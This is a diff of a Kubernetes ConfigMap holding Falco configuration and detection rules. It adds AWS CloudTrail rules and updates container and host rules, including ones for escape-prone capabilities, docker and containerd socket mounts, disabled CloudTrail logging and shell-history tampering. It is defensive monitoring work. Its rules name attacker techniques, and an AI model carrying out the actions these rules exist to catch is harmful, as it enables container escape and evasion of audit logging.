modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. 
\"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. 
When Falco detects that this buffer is
     # full and system calls have been dropped, it can take one or more of
     # the following actions:
     #   - ignore: do nothing (default when list of actions is empty)
     #   - log: log a DEBUG message noting that the buffer was full
     #   - alert: emit a Falco alert noting that the buffer was full
     #   - exit: exit Falco with a non-zero rc
     #
     # Note that it is not possible to both ignore and log/alert messages at the same time.
     #
     # The rate at which log/alert messages are emitted is governed by a
     # token bucket. The rate corresponds to one message every 30 seconds
     # with a burst of one message (by default).
     #
     # The messages are emitted when the percentage of dropped system calls
     # with respect to the number of events in the last second
     # is greater than the given threshold (a double in the range [0, 1]).
     #
     # For debugging/testing it is possible to simulate the drops using
     # `simulate_drops: true`. In this case the threshold does not apply.
     syscall_event_drops:
       threshold: 0.1
       actions:
         - log
         - alert
       rate: 0.03333
       max_burst: 1

     # Falco uses a shared buffer between the kernel and userspace to receive
     # the events (e.g., system call information) in userspace.
     #
     # However, the underlying libraries can also time out for various reasons.
     # For example, there could have been issues while reading an event,
     # or the particular event needs to be skipped.
     # Normally, it is very unlikely that Falco does not receive events consecutively.
     #
     # Falco is able to detect such an uncommon situation.
     #
     # Here you can configure the maximum number of consecutive timeouts without an event
     # after which you want Falco to alert.
     # By default this value is set to 1000 consecutive timeouts without an event at all.
     # How this value maps to a time interval depends on the CPU frequency.
     syscall_event_timeouts:
       max_consecutives: 1000

     # Falco continuously monitors the performance of its outputs. When an output
     # channel cannot deliver an alert within a given deadline, an error is reported
     # indicating which output is blocking notifications.
     # The timeout error will be reported to the log according to the above log_* settings.
     # Note that the notification will not be discarded from the output queue; thus,
     # output channels may remain blocked indefinitely.
     # An output timeout error indicates a misconfiguration issue or I/O problems
     # that cannot be recovered by Falco and should be fixed by the user.
     #
     # The "output_timeout" value specifies the duration in milliseconds to wait before
     # considering the deadline exceeded.
     #
     # With the default of 2000ms, the notification consumer can block the Falco output
     # for up to 2 seconds without reaching the timeout.
     output_timeout: 2000

     # A throttling mechanism implemented as a token bucket limits the
     # rate of Falco notifications. This throttling is controlled by the following
     # configuration options:
     #  - rate: the number of tokens (i.e. the right to send a notification)
     #    gained per second. Defaults to 1.
     #  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.
     #
     # With these defaults, Falco could send up to 1000 notifications after
     # an initial quiet period, and then up to 1 notification per second
     # afterward. It would gain the full burst back after 1000 seconds of
     # no activity.
     outputs:
       rate: 1
       max_burst: 1000

     # Where security notifications should go.
     # Multiple outputs can be enabled.
     syslog_output:
       enabled: true

     # If keep_alive is set to true, the file will be opened once and
     # continuously written to, with each output message on its own
     # line. If keep_alive is set to false, the file will be re-opened
     # for each output message.
     #
     # Also, the file will be closed and reopened if Falco is signaled with
     # SIGUSR1.
     file_output:
       enabled: false
       keep_alive: false
       filename: ./events.txt

     stdout_output:
       enabled: true

     # Falco contains an embedded webserver that can be used to accept K8s
     # Audit Events. These config options control the behavior of that
     # webserver. (By default, the webserver is disabled.)
     #
     # The ssl_certificate is a combined SSL certificate and corresponding
     # key contained in a single file. You can generate a key/cert as follows:
     #
     # $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
     # $ cat certificate.pem key.pem > falco.pem
     # $ sudo cp falco.pem /etc/falco/falco.pem
     webserver:
       enabled: true
       listen_port: 8765
       k8s_healthz_endpoint: /healthz
       ssl_enabled: false
       ssl_certificate: /etc/falco/certs/falco.pem

     # If keep_alive is set to true, the program will be started once and
     # continuously written to, with each output message on its own
     # line. If keep_alive is set to false, the program will be re-spawned
     # for each output message.
     #
     # Also, the program will be closed and reopened if Falco is signaled with
     # SIGUSR1.
     program_output:
       enabled: false
       keep_alive: false
       program: |
         mail -s "Falco Notification" someone@example.com

     http_output:
       enabled: true
       url: 'http://falco-sidekick-falcosidekick:2801'
       user_agent: falcosecurity/falco


     # Falco supports running a gRPC server with two main binding types:
     # 1. Over the network with mandatory mutual TLS authentication (mTLS)
     # 2. Over a local unix socket with no authentication
     # By default, the gRPC server is disabled, with no enabled services (see grpc_output);
     # please comment/uncomment and change the options below accordingly to configure it.
     # Important note: if Falco has any trouble creating the gRPC server,
     # this information will be logged, but the main Falco daemon will not be stopped.
     # gRPC server over the network with (mandatory) mutual TLS configuration.
     # This gRPC server is secure by default, so you need to generate certificates and update their paths here.
     # By default the gRPC server is off.
     # You can configure the address to bind and expose it.
     # By modifying the threadiness configuration you can fine-tune the number of threads (and contexts) it will use.
     # grpc:
     #   enabled: true
     #   bind_address: "0.0.0.0:5060"
     #   # when threadiness is 0, Falco sets it automatically by figuring out the number of online cores
     #   threadiness: 0
     #   private_key: "/etc/falco/certs/server.key"
     #   cert_chain: "/etc/falco/certs/server.crt"
     #   root_certs: "/etc/falco/certs/ca.crt"
     grpc:
       enabled: true
       threadiness: 0
       bind_address: "unix:///var/run/falco/falco.sock"

     # gRPC output service.
     # By default it is off.
     # By enabling this, all output events will be kept in memory until you read them with a gRPC client.
     # Make sure to have a consumer for them, or leave this disabled.
     grpc_output:
       enabled: true

     # Container orchestrator metadata fetching params
     metadata_download:
       max_mb: 100
       chunk_wait_us: 1000
       watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect creation of a new service in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task being started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        An encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deletion of the public access block on a bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: CloudTrail logging has been disabled; this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
